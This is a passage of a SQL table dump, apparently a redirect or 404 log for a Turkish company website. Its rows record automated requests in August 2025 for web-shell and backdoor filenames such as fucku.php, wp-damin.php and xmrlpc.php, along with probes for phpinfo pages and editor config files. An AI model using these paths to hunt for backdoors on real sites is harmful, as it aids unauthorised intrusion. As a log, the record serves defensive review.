00:00:00',301),(45284,'http://3s-technologies.com.tr/tr/gfi13m.php',NULL,'','',1,0,'2025-08-20 11:56:32','0000-00-00 00:00:00',301),(45285,'http://3s-technologies.com.tr/tr/dng.php',NULL,'','',3,0,'2025-08-20 11:56:33','0000-00-00 00:00:00',301),(45286,'http://3s-technologies.com.tr/tr/rd1.php',NULL,'','',2,0,'2025-08-20 11:56:35','0000-00-00 00:00:00',301),(45287,'http://3s-technologies.com.tr/tr/rules.php',NULL,'','',2,0,'2025-08-20 11:56:35','0000-00-00 00:00:00',301),(45288,'http://3s-technologies.com.tr/tr/utf88.php',NULL,'','',2,0,'2025-08-20 11:56:36','0000-00-00 00:00:00',301),(45289,'http://3s-technologies.com.tr/tr/abcd.php',NULL,'','',283,0,'2025-08-20 11:56:38','0000-00-00 00:00:00',301),(45290,'http://3s-technologies.com.tr/tr/output.php',NULL,'','',4,0,'2025-08-20 11:56:40','0000-00-00 00:00:00',301),(45291,'http://3s-technologies.com.tr/tr/func.php',NULL,'','',2,0,'2025-08-20 11:56:41','0000-00-00 00:00:00',301),(45292,'http://3s-technologies.com.tr/tr/asd67.php',NULL,'','',57,0,'2025-08-20 11:56:43','0000-00-00 00:00:00',301),(45293,'http://3s-technologies.com.tr/tr/blok.php',NULL,'','',2,0,'2025-08-20 11:56:43','0000-00-00 00:00:00',301),(45294,'http://3s-technologies.com.tr/tr/ftp.php',NULL,'','',17,0,'2025-08-20 11:56:44','0000-00-00 00:00:00',301),(45295,'http://3s-technologies.com.tr/tr/tgrs.php',NULL,'','',15,0,'2025-08-20 11:56:45','0000-00-00 00:00:00',301),(45296,'http://3s-technologies.com.tr/tr/wff.php',NULL,'','',2,0,'2025-08-20 11:56:45','0000-00-00 00:00:00',301),(45297,'http://3s-technologies.com.tr/tr/wek.php',NULL,'','',4,0,'2025-08-20 11:56:46','0000-00-00 00:00:00',301),(45298,'http://3s-technologies.com.tr/tr/asu.php',NULL,'','',4,0,'2025-08-20 11:56:47','0000-00-00 00:00:00',301),(45299,'http://3s-technologies.com.tr/tr/witmm.php',NULL,'','',24,0,'2025-08-20 11:56:48','0000-00-00 00:00:00',301),(45300,'http://3s-technologies.com.tr/tr/userfuns.php',NULL,'','',7,0,'2025-08-20 11:56:48','0000-00-00 00:00:00',301),(45301,'http://3s-technologies.com.tr/tr/ncx.php',NULL,'','',6,0,'2025-08-20 11:56:49','0000-00-00 00:00:00',301),(45302,'http://3s-technologies.com.tr/tr/video.php',NULL,'','',1,0,'2025-08-20 11:56:50','0000-00-00 00:00:00',301),(45303,'http://3s-technologies.com.tr/tr/infolw.php',NULL,'','',1,0,'2025-08-20 11:56:51','0000-00-00 00:00:00',301),(45304,'http://3s-technologies.com.tr/tr/common.php',NULL,'','',2,0,'2025-08-20 11:56:51','0000-00-00 00:00:00',301),(45305,'http://3s-technologies.com.tr/tr/qing.php',NULL,'','',13,0,'2025-08-20 11:56:53','0000-00-00 00:00:00',301),(45306,'http://3s-technologies.com.tr/tr/test_recaptcha.php',NULL,'','',1,0,'2025-08-20 11:56:53','0000-00-00 00:00:00',301),(45307,'http://3s-technologies.com.tr/tr/mms.php',NULL,'','',10,0,'2025-08-20 11:56:54','0000-00-00 00:00:00',301),(45308,'http://3s-technologies.com.tr/tr/gv_send.php',NULL,'','',1,0,'2025-08-20 11:56:57','0000-00-00 00:00:00',301),(45309,'http://3s-technologies.com.tr/tr/refhny.php',NULL,'','',1,0,'2025-08-20 11:56:58','0000-00-00 00:00:00',301),(45310,'http://3s-technologies.com.tr/tr/yatego.php',NULL,'','',1,0,'2025-08-20 11:56:59','0000-00-00 00:00:00',301),(45311,'http://3s-technologies.com.tr/tr/redirect.php',NULL,'','',1,0,'2025-08-20 11:56:59','0000-00-00 00:00:00',301),(45312,'http://3s-technologies.com.tr/tr/wp-admin/user/fucku.php',NULL,'','',1,0,'2025-08-21 08:58:04','0000-00-00 00:00:00',301),(45313,'http://3s-technologies.com.tr/tr/wp-includes/blocks/up.php',NULL,'','',2,0,'2025-08-21 08:58:05','0000-00-00 00:00:00',301),(45314,'http://3s-technologies.com.tr/tr/wp-admin/worksec.php',NULL,'','',3,0,'2025-08-21 08:58:06','0000-00-00 00:00:00',301),(45315,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/goat1.php',NULL,'','',1,0,'2025-08-21 08:58:06','0000-00-00 00:00:00',301),(45316,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/item.php',NULL,'','',1,0,'2025-08-21 08:58:07','0000-00-00 00:00:00',301),(45317,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/log.php',NULL,'','',1,0,'2025-08-21 08:58:08','0000-00-00 00:00:00',301),(45318,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/go.php',NULL,'','',1,0,'2025-08-21 08:58:10','0000-00-00 00:00:00',301),(45319,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/as.php',NULL,'','',1,0,'2025-08-21 08:58:11','0000-00-00 00:00:00',301),(45320,'http://3s-technologies.com.tr/tr/wp-includes/customize/rk2.php',NULL,'','',1,0,'2025-08-21 08:58:11','0000-00-00 00:00:00',301),(45321,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/readme.php',NULL,'','',1,0,'2025-08-21 08:58:12','0000-00-00 00:00:00',301),(45322,'http://3s-technologies.com.tr/tr/wp-includes/assets/wp_filemanager.php',NULL,'','',1,0,'2025-08-21 08:58:13','0000-00-00 00:00:00',301),(45323,'http://3s-technologies.com.tr/tr/wp-content/plugins/hellopress/up.php',NULL,'','',1,0,'2025-08-21 08:58:14','0000-00-00 00:00:00',301),(45324,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/fucku.php',NULL,'','',1,0,'2025-08-21 08:58:15','0000-00-00 00:00:00',301),(45325,'http://3s-technologies.com.tr/tr/about/webadmin.php',NULL,'','',2,0,'2025-08-21 08:58:15','0000-00-00 00:00:00',301),(45326,'http://3s-technologies.com.tr/tr/about/edit.php',NULL,'','',1,0,'2025-08-21 08:58:16','0000-00-00 00:00:00',301),(45327,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/xmrlpc.php',NULL,'','',1,0,'2025-08-21 08:58:17','0000-00-00 00:00:00',301),(45328,'http://3s-technologies.com.tr/tr/wp-admin/images/wp-mail.php',NULL,'','',1,0,'2025-08-21 08:58:17','0000-00-00 00:00:00',301),(45329,'http://3s-technologies.com.tr/tr/wp-content/themes/aahana/wp-2019.php',NULL,'','',1,0,'2025-08-21 08:58:18','0000-00-00 00:00:00',301),(45330,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/network.php',NULL,'','',1,0,'2025-08-21 08:58:19','0000-00-00 00:00:00',301),(45331,'http://3s-technologies.com.tr/tr/wp-includes/js/wp-trackback.php',NULL,'','',1,0,'2025-08-21 08:58:20','0000-00-00 00:00:00',301),(45332,'http://3s-technologies.com.tr/tr/wp-admin/js/yes.php',NULL,'','',1,0,'2025-08-21 08:58:20','0000-00-00 00:00:00',301),(45333,'http://3s-technologies.com.tr/tr/wp-includes/pomo/f35.php',NULL,'','',1,0,'2025-08-21 08:58:22','0000-00-00 00:00:00',301),(45334,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/makeasmtp.php',NULL,'','',1,0,'2025-08-21 08:58:23','0000-00-00 00:00:00',301),(45335,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/rk2.php',NULL,'','',1,0,'2025-08-21 08:58:24','0000-00-00 00:00:00',301),(45336,'http://3s-technologies.com.tr/tr/files/gecko-litespeed.php',NULL,'','',2,0,'2025-08-21 08:58:25','0000-00-00 00:00:00',301),(45337,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/setup-config.php',NULL,'','',1,0,'2025-08-21 08:58:25','0000-00-00 00:00:00',301),(45338,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/defaults.php',NULL,'','',1,0,'2025-08-21 08:58:26','0000-00-00 00:00:00',301),(45339,'http://3s-technologies.com.tr/tr/wp-admin/css/ty.php',NULL,'','',1,0,'2025-08-21 08:58:28','0000-00-00 00:00:00',301),(45340,'http://3s-technologies.com.tr/tr/wp-content/languages/mah.php',NULL,'','',1,0,'2025-08-21 08:58:29','0000-00-00 00:00:00',301),(45341,'http://3s-technologies.com.tr/tr/update/upload.php',NULL,'','',1,0,'2025-08-21 08:58:29','0000-00-00 00:00:00',301),(45342,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/as.php',NULL,'','',1,0,'2025-08-21 08:58:30','0000-00-00 00:00:00',301),(45343,'http://3s-technologies.com.tr/tr/wp-admin/includes/edit-tags.php',NULL,'','',1,0,'2025-08-21 08:58:31','0000-00-00 00:00:00',301),(45344,'http://3s-technologies.com.tr/tr/wp-content/languages/f35.php',NULL,'','',1,0,'2025-08-21 08:58:32','0000-00-00 00:00:00',301),(45345,'http://3s-technologies.com.tr/tr/assets/images/db.php?u',NULL,'','',1,0,'2025-08-21 08:58:33','0000-00-00 00:00:00',301),(45346,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/simple.php',NULL,'','',1,0,'2025-08-21 08:58:34','0000-00-00 00:00:00',301),(45347,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/system_log.php',NULL,'','',1,0,'2025-08-21 08:58:35','0000-00-00 00:00:00',301),(45348,'http://3s-technologies.com.tr/tr/wp-admin/network/up.php',NULL,'','',1,0,'2025-08-21 08:58:35','0000-00-00 00:00:00',301),(45349,'http://3s-technologies.com.tr/tr/update/worksec.php',NULL,'','',1,0,'2025-08-21 08:58:36','0000-00-00 00:00:00',301),(45350,'http://3s-technologies.com.tr/tr/wp-includes/customize/readme.php',NULL,'','',1,0,'2025-08-21 08:58:37','0000-00-00 00:00:00',301),(45351,'http://3s-technologies.com.tr/tr/wp-content/link.php',NULL,'','',1,0,'2025-08-21 08:58:38','0000-00-00 00:00:00',301),(45352,'http://3s-technologies.com.tr/tr/wp-content/themes/getid3s.php',NULL,'','',1,0,'2025-08-21 08:58:38','0000-00-00 00:00:00',301),(45353,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/edit.php',NULL,'','',1,0,'2025-08-21 08:58:39','0000-00-00 00:00:00',301),(45354,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/xp.php',NULL,'','',1,0,'2025-08-21 08:58:40','0000-00-00 00:00:00',301),(45355,'http://3s-technologies.com.tr/tr/wp-includes/ixr/test.php',NULL,'','',1,0,'2025-08-21 08:58:40','0000-00-00 00:00:00',301),(45356,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins/403.php',NULL,'','',1,0,'2025-08-21 08:58:41','0000-00-00 00:00:00',301),(45357,'http://3s-technologies.com.tr/tr/media.php.infected.php',NULL,'','',3,0,'2025-08-21 08:58:43','0000-00-00 00:00:00',301),(45358,'http://3s-technologies.com.tr/tr/admin/lock360.php',NULL,'','',3,0,'2025-08-21 08:58:45','0000-00-00 00:00:00',301),(45359,'http://3s-technologies.com.tr/tr/wp-includes/class.php',NULL,'','',3,0,'2025-08-21 08:58:46','0000-00-00 00:00:00',301),(45360,'http://3s-technologies.com.tr/tr/wp-includes/widgets/media.php.infected.php',NULL,'','',1,0,'2025-08-21 08:58:47','0000-00-00 00:00:00',301),(45361,'http://3s-technologies.com.tr/tr/wp-includes/ixr/webadmin.php',NULL,'','',1,0,'2025-08-21 08:58:48','0000-00-00 00:00:00',301),(45362,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/maint.php',NULL,'','',1,0,'2025-08-21 08:58:48','0000-00-00 00:00:00',301),(45363,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/0x.php',NULL,'','',1,0,'2025-08-21 08:58:49','0000-00-00 00:00:00',301),(45364,'http://3s-technologies.com.tr/tr/wp-includes/images/smilies/link.php',NULL,'','',1,0,'2025-08-21 08:58:50','0000-00-00 00:00:00',301),(45365,'http://3s-technologies.com.tr/tr/wp-content/uploads/edit-tags.php',NULL,'','',1,0,'2025-08-21 08:58:51','0000-00-00 00:00:00',301),(45366,'http://3s-technologies.com.tr/tr/wp-includes/fonts/core.php',NULL,'','',1,0,'2025-08-21 08:58:52','0000-00-00 00:00:00',301),(45367,'http://3s-technologies.com.tr/tr/wp-includes/id3/menu.php',NULL,'','',2,0,'2025-08-21 08:58:53','0000-00-00 00:00:00',301),(45368,'http://3s-technologies.com.tr/tr/wp-includes/assets/wp-damin.php',NULL,'','',1,0,'2025-08-21 08:58:54','0000-00-00 00:00:00',301),(45369,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/gecko-litespeed.php',NULL,'','',1,0,'2025-08-21 08:58:55','0000-00-00 00:00:00',301),(45370,'http://3s-technologies.com.tr/tr/wp-includes/blocks/item.php',NULL,'','',1,0,'2025-08-21 08:58:56','0000-00-00 00:00:00',301),(45371,'http://3s-technologies.com.tr/tr/wp-includes/assets/upload.php',NULL,'','',1,0,'2025-08-21 08:58:57','0000-00-00 00:00:00',301),(45372,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints/wp-damin.php',NULL,'','',1,0,'2025-08-21 08:58:58','0000-00-00 00:00:00',301),(45373,'http://3s-technologies.com.tr/tr/wp-content/themes/cay-van-phong/maint.php',NULL,'','',1,0,'2025-08-21 08:58:59','0000-00-00 00:00:00',301),(45374,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/info.php',NULL,'','',4,0,'2025-08-21 08:59:00','0000-00-00 00:00:00',301),(45375,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/filemanager.php',NULL,'','',1,0,'2025-08-21 08:59:00','0000-00-00 00:00:00',301),(45376,'http://3s-technologies.com.tr/tr/wp-includes/id3/baxa1.php8',NULL,'','',1,0,'2025-08-21 08:59:01','0000-00-00 00:00:00',301),(45377,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/xp.php',NULL,'','',1,0,'2025-08-21 08:59:02','0000-00-00 00:00:00',301),(45378,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/ty.php',NULL,'','',1,0,'2025-08-21 08:59:02','0000-00-00 00:00:00',301),(45379,'http://3s-technologies.com.tr/tr/wp-includes/images/wlw/themes.php',NULL,'','',1,0,'2025-08-21 08:59:04','0000-00-00 00:00:00',301),(45380,'http://3s-technologies.com.tr/tr/.well-known/edit.php',NULL,'','',4,0,'2025-08-21 08:59:04','0000-00-00 00:00:00',301),(45381,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/fucku.php',NULL,'','',1,0,'2025-08-21 08:59:05','0000-00-00 00:00:00',301),(45382,'http://3s-technologies.com.tr/tr/assets/images/network.php',NULL,'','',2,0,'2025-08-21 08:59:06','0000-00-00 00:00:00',301),(45383,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/network.php',NULL,'','',1,0,'2025-08-21 08:59:07','0000-00-00 00:00:00',301),(45384,'http://3s-technologies.com.tr/tr/wp-admin/includes/radio.php',NULL,'','',1,0,'2025-08-21 08:59:08','0000-00-00 00:00:00',301),(45385,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/wp-conflg.php/wp-content/plugins/google-seo-rank/xp.php',NULL,'','',3,0,'2025-08-21 08:59:09','0000-00-00 00:00:00',301),(45386,'http://3s-technologies.com.tr/tr/wp-includes/js/getid3s.php',NULL,'','',1,0,'2025-08-21 08:59:09','0000-00-00 00:00:00',301),(45387,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/mah.php',NULL,'','',1,0,'2025-08-21 08:59:10','0000-00-00 00:00:00',301),(45388,'http://3s-technologies.com.tr/tr/update/wp-2019.php',NULL,'','',3,0,'2025-08-21 08:59:11','0000-00-00 00:00:00',301),(45389,'http://3s-technologies.com.tr/tr/uploads/maint.php',NULL,'','',1,0,'2025-08-21 08:59:11','0000-00-00 00:00:00',301),(45390,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/worksec.php',NULL,'','',1,0,'2025-08-21 08:59:12','0000-00-00 00:00:00',301),(45391,'http://3s-technologies.com.tr/tr/js/hydxrmgtbh.php',NULL,'','',1,0,'2025-08-21 08:59:13','0000-00-00 00:00:00',301),(45392,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/doc.php',NULL,'','',1,0,'2025-08-21 08:59:14','0000-00-00 00:00:00',301),(45393,'http://3s-technologies.com.tr/tr/wp-includes/widgets/admin.php',NULL,'','',1,0,'2025-08-21 08:59:14','0000-00-00 00:00:00',301),(45394,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/xmrlpc.php',NULL,'','',1,0,'2025-08-21 08:59:15','0000-00-00 00:00:00',301),(45395,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/mail.php',NULL,'','',1,0,'2025-08-21 08:59:16','0000-00-00 00:00:00',301),(45396,'http://3s-technologies.com.tr/tr/wp-includes/date-object.php',NULL,'','',1,0,'2025-08-21 09:02:39','0000-00-00 00:00:00',301),(45397,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/dodo.php',NULL,'','',1,0,'2025-08-21 09:02:41','0000-00-00 00:00:00',301),(45398,'http://3s-technologies.com.tr/tr/wp-content/uploads/wpr-addons/forms/data.php',NULL,'','',1,0,'2025-08-21 09:02:42','0000-00-00 00:00:00',301),(45399,'http://3s-technologies.com.tr/tr/wp-includes/repeater.php/wp-cron.php',NULL,'','',1,0,'2025-08-21 09:02:43','0000-00-00 00:00:00',301),(45400,'http://3s-technologies.com.tr/tr/index/zwso.php',NULL,'','',3,0,'2025-08-21 09:02:44','0000-00-00 00:00:00',301),(45401,'http://3s-technologies.com.tr/tr/wp-includes/js/swfupload/t5jwhy/webdb.php',NULL,'','',1,0,'2025-08-21 09:02:46','0000-00-00 00:00:00',301),(45402,'http://3s-technologies.com.tr/tr/wp-admin/network/site-upload.php',NULL,'','',1,0,'2025-08-21 09:02:47','0000-00-00 00:00:00',301),(45403,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-http-proxy-list.php',NULL,'','',1,0,'2025-08-21 09:02:48','0000-00-00 00:00:00',301),(45404,'http://3s-technologies.com.tr/tr/wp-admin/images/index.php/wp-includes/wp-login.php',NULL,'','',3,0,'2025-08-21 09:02:50','0000-00-00 00:00:00',301),(45405,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/bak.php',NULL,'','',2,0,'2025-08-21 09:02:51','0000-00-00 00:00:00',301),(45406,'http://3s-technologies.com.tr/tr/wp-includes/block-bindings/pattern-overrides-float.php',NULL,'','',1,0,'2025-08-21 09:02:52','0000-00-00 00:00:00',301),(45407,'http://3s-technologies.com.tr/tr/wp-admin/includes/credits-all.php',NULL,'','',1,0,'2025-08-21 09:02:54','0000-00-00 00:00:00',301),(45408,'http://3s-technologies.com.tr/tr/wp-content/uploads/2023/04/wp-casper.php',NULL,'','',1,0,'2025-08-21 09:02:56','0000-00-00 00:00:00',301),(45409,'http://3s-technologies.com.tr/tr/.well-known/nam.php',NULL,'','',1,0,'2025-08-21 09:02:58','0000-00-00 00:00:00',301),(45410,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/end.php',NULL,'','',1,0,'2025-08-21 09:02:59','0000-00-00 00:00:00',301),(45411,'http://3s-technologies.com.tr/tr/wp-content/plugins/jqufjki/index.php',NULL,'','',1,0,'2025-08-21 09:03:00','0000-00-00 00:00:00',301),(45412,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/bbinip.php',NULL,'','',1,0,'2025-08-21 09:03:01','0000-00-00 00:00:00',301),(45413,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/pepe.php',NULL,'','',3,0,'2025-08-21 09:03:02','0000-00-00 00:00:00',301),(45414,'http://3s-technologies.com.tr/tr/wp-includes/widgets/system.php',NULL,'','',1,0,'2025-08-21 09:03:03','0000-00-00 00:00:00',301),(45415,'http://3s-technologies.com.tr/tr/wp-admin/images/lint-branch.php',NULL,'','',1,0,'2025-08-21 09:03:05','0000-00-00 00:00:00',301),(45416,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/admin.php',NULL,'','',2,0,'2025-08-21 09:03:06','0000-00-00 00:00:00',301),(45417,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-custom-image-header-class.php',NULL,'','',1,0,'2025-08-21 09:03:09','0000-00-00 00:00:00',301),(45418,'http://3s-technologies.com.tr/tr/wp-includes/ixr/class-ixr-client-merge.php',NULL,'','',1,0,'2025-08-21 09:03:10','0000-00-00 00:00:00',301),(45419,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/sunrise/ colors.php',NULL,'','',1,0,'2025-08-21 09:03:11','0000-00-00 00:00:00',301),(45420,'http://3s-technologies.com.tr/tr/izusdinh.php',NULL,'','',1,0,'2025-08-21 09:03:11','0000-00-00 00:00:00',301),(45421,'http://3s-technologies.com.tr/tr/wp-content/plugins/sklnlgu/index.php',NULL,'','',1,0,'2025-08-21 09:03:13','0000-00-00 00:00:00',301),(45422,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/file.php',NULL,'','',17,0,'2025-08-21 09:03:16','0000-00-00 00:00:00',301),(45423,'http://3s-technologies.com.tr/tr/wp-admin/maint/singlex.php',NULL,'','',1,0,'2025-08-21 09:03:17','0000-00-00 00:00:00',301),(45424,'http://3s-technologies.com.tr/tr/wp-content/plugins/liauudv/index.php',NULL,'','',1,0,'2025-08-21 09:03:19','0000-00-00 00:00:00',301),(45425,'http://3s-technologies.com.tr/tr/wp-admin/images/browser.php',NULL,'','',1,0,'2025-08-21 09:03:20','0000-00-00 00:00:00',301),(45426,'http://3s-technologies.com.tr/tr/wp-admin/includes/plugin-wp.php',NULL,'','',1,0,'2025-08-21 09:03:21','0000-00-00 00:00:00',301),(45427,'http://3s-technologies.com.tr/tr/wp-admin/maint/pagea.php',NULL,'','',1,0,'2025-08-21 09:03:21','0000-00-00 00:00:00',301),(45428,'http://3s-technologies.com.tr/tr/wp-content/plugins/ogtxrbz/index.php',NULL,'','',1,0,'2025-08-21 09:03:22','0000-00-00 00:00:00',301),(45429,'http://3s-technologies.com.tr/tr/wp-admin/includes/pt.php',NULL,'','',1,0,'2025-08-21 09:03:23','0000-00-00 00:00:00',301),(45430,'http://3s-technologies.com.tr/tr/ogpelsnd.php',NULL,'','',2,0,'2025-08-21 09:03:24','0000-00-00 00:00:00',301),(45431,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/wp-hayato.php',NULL,'','',1,0,'2025-08-21 09:03:27','0000-00-00 00:00:00',301),(45432,'http://3s-technologies.com.tr/tr/wp-content/uploads/layout.php',NULL,'','',1,0,'2025-08-21 09:03:28','0000-00-00 00:00:00',301),(45433,'http://3s-technologies.com.tr/tr/wp-content/plugins/ptgseoj/index.php',NULL,'','',1,0,'2025-08-21 09:03:29','0000-00-00 00:00:00',301),(45434,'http://3s-technologies.com.tr/tr/wp-content/plugins/ascztoi/index.php',NULL,'','',1,0,'2025-08-21 09:03:30','0000-00-00 00:00:00',301),(45435,'http://3s-technologies.com.tr/tr/.well-known/ae.php',NULL,'','',1,0,'2025-08-21 09:03:31','0000-00-00 00:00:00',301),(45436,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/wp-hayato.php',NULL,'','',1,0,'2025-08-21 09:03:31','0000-00-00 00:00:00',301),(45437,'http://3s-technologies.com.tr/tr/wp-content/plugins/barsgfm/index.php',NULL,'','',1,0,'2025-08-21 09:03:32','0000-00-00 00:00:00',301),(45438,'http://3s-technologies.com.tr/tr/twlsgobh.php',NULL,'','',2,0,'2025-08-21 09:03:35','0000-00-00 00:00:00',301),(45439,'http://3s-technologies.com.tr/tr/wp-includes/pomo/entry-view.php',NULL,'','',1,0,'2025-08-21 09:03:36','0000-00-00 00:00:00',301),(45440,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/file.php',NULL,'','',1,0,'2025-08-21 09:03:36','0000-00-00 00:00:00',301),(45441,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-widget-archives-add.php',NULL,'','',1,0,'2025-08-21 09:03:37','0000-00-00 00:00:00',301),(45442,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-block-editor-context-first.php',NULL,'','',1,0,'2025-08-21 09:03:38','0000-00-00 00:00:00',301),(45443,'http://3s-technologies.com.tr/tr/wp-content/plugins/vfbratv/index.php',NULL,'','',1,0,'2025-08-21 09:03:39','0000-00-00 00:00:00',301),(45444,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-widget-head.php',NULL,'','',1,0,'2025-08-21 09:03:40','0000-00-00 00:00:00',301),(45445,'http://3s-technologies.com.tr/tr/wp-admin/css/tsconfig.php',NULL,'','',1,0,'2025-08-21 09:03:41','0000-00-00 00:00:00',301),(45446,'http://3s-technologies.com.tr/tr/nx.php',NULL,'','',13,0,'2025-08-21 10:02:23','0000-00-00 00:00:00',301),(45447,'http://3s-technologies.com.tr/tr/sx21_1.php',NULL,'','',18,0,'2025-08-21 10:02:24','0000-00-00 00:00:00',301),(45448,'http://3s-technologies.com.tr/tr/bluejackets.php',NULL,'','',12,0,'2025-08-21 10:02:25','0000-00-00 00:00:00',301),(45449,'http://3s-technologies.com.tr/tr/pop.php',NULL,'','',41,0,'2025-08-21 10:02:26','0000-00-00 00:00:00',301),(45450,'http://3s-technologies.com.tr/tr/nx9.php',NULL,'','',11,0,'2025-08-21 10:02:26','0000-00-00 00:00:00',301),(45451,'http://3s-technologies.com.tr/tr/kwm4.php',NULL,'','',11,0,'2025-08-21 10:02:27','0000-00-00 00:00:00',301),(45452,'http://3s-technologies.com.tr/tr/ea3f.php',NULL,'','',11,0,'2025-08-21 10:02:27','0000-00-00 00:00:00',301),(45453,'http://3s-technologies.com.tr/tr/cwsd.php',NULL,'','',11,0,'2025-08-21 10:02:28','0000-00-00 00:00:00',301),(45454,'http://3s-technologies.com.tr/tr/litanies.php',NULL,'','',11,0,'2025-08-21 10:02:33','0000-00-00 00:00:00',301),(45455,'http://3s-technologies.com.tr/tr/just2.php',NULL,'','',13,0,'2025-08-21 10:02:34','0000-00-00 00:00:00',301),(45456,'http://3s-technologies.com.tr/tr/ex.php',NULL,'','',25,0,'2025-08-21 10:02:38','0000-00-00 00:00:00',301),(45457,'http://3s-technologies.com.tr/tr/let.php',NULL,'','',17,0,'2025-08-21 10:02:42','0000-00-00 00:00:00',301),(45458,'http://3s-technologies.com.tr/tr/amphicyon.php',NULL,'','',10,0,'2025-08-21 10:02:43','0000-00-00 00:00:00',301),(45459,'http://www.3s-technologies.com.tr/en/home-en\n',NULL,'','',2,0,'2025-08-21 16:38:28','0000-00-00 00:00:00',301),(45460,'http://3s-technologies.com.tr/tr/uwu2.php',NULL,'','',19,0,'2025-08-21 19:26:43','0000-00-00 00:00:00',301),(45461,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/ahşap-işleme-wood-processing-120cm\n',NULL,'','',3,0,'2025-08-21 20:30:59','0000-00-00 00:00:00',301),(45462,'http://3s-technologies.com.tr/tr/lara/php-info.php',NULL,'','',1,0,'2025-08-22 01:10:33','0000-00-00 00:00:00',301),(45463,'http://3s-technologies.com.tr/tr/file9',NULL,'','',1,0,'2025-08-22 01:11:11','0000-00-00 00:00:00',301),(45464,'http://3s-technologies.com.tr/tr/x7.php',NULL,'','',37,0,'2025-08-22 05:11:37','0000-00-00 00:00:00',301),(45465,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/tr',NULL,'','',2,0,'2025-08-22 06:08:06','0000-00-00 00:00:00',301),(45466,'http://3s-technologies.com.tr/tr/grscmyxu.php',NULL,'','',1,0,'2025-08-22 12:44:42','0000-00-00 00:00:00',301),(45467,'http://3s-technologies.com.tr/tr/upload/petit/fm.php',NULL,'','',1,0,'2025-08-22 12:44:45','0000-00-00 00:00:00',301),(45468,'http://3s-technologies.com.tr/tr/xnfouvrt.php',NULL,'','',2,0,'2025-08-22 12:44:46','0000-00-00 00:00:00',301),(45469,'http://3s-technologies.com.tr/tr/qrujpzwl.php',NULL,'','',2,0,'2025-08-22 12:44:55','0000-00-00 00:00:00',301),(45470,'http://3s-technologies.com.tr/tr/ufwodvsa.php',NULL,'','',1,0,'2025-08-22 12:44:57','0000-00-00 00:00:00',301),(45471,'http://3s-technologies.com.tr/tr/acfipnci.php',NULL,'','',3,0,'2025-08-22 12:45:00','0000-00-00 00:00:00',301),(45472,'http://3s-technologies.com.tr/tr/oempprdj.php',NULL,'','',1,0,'2025-08-22 12:45:03','0000-00-00 00:00:00',301),(45473,'http://3s-technologies.com.tr/tr/lrxqxgbi.php',NULL,'','',1,0,'2025-08-22 12:45:06','0000-00-00 00:00:00',301),(45474,'http://3s-technologies.com.tr/tr/vynypyss.php',NULL,'','',1,0,'2025-08-22 12:45:10','0000-00-00 00:00:00',301),(45475,'http://3s-technologies.com.tr/tr/sqofsici.php',NULL,'','',2,0,'2025-08-22 12:45:18','0000-00-00 00:00:00',301),(45476,'http://3s-technologies.com.tr/tr/sallu.php',NULL,'','',21,0,'2025-08-22 12:59:33','0000-00-00 00:00:00',301),(45477,'http://3s-technologies.com.tr/tr/tsconfig.spec.json',NULL,'http://3s-technologies.com.tr/tsconfig.spec.json','',1,0,'2025-08-22 14:29:16','0000-00-00 00:00:00',301),(45478,'http://3s-technologies.com.tr/tr/phpinfo.php4',NULL,'http://3s-technologies.com.tr/phpinfo.php4','',1,0,'2025-08-22 14:29:21','0000-00-00 00:00:00',301),(45479,'http://3s-technologies.com.tr/tr/dev/phpinfo.php',NULL,'http://3s-technologies.com.tr/dev/phpinfo.php','',1,0,'2025-08-22 14:29:23','0000-00-00 00:00:00',301),(45480,'http://3s-technologies.com.tr/tr/.vscode/settings.json',NULL,'http://3s-technologies.com.tr/.vscode/settings.json','',2,0,'2025-08-22 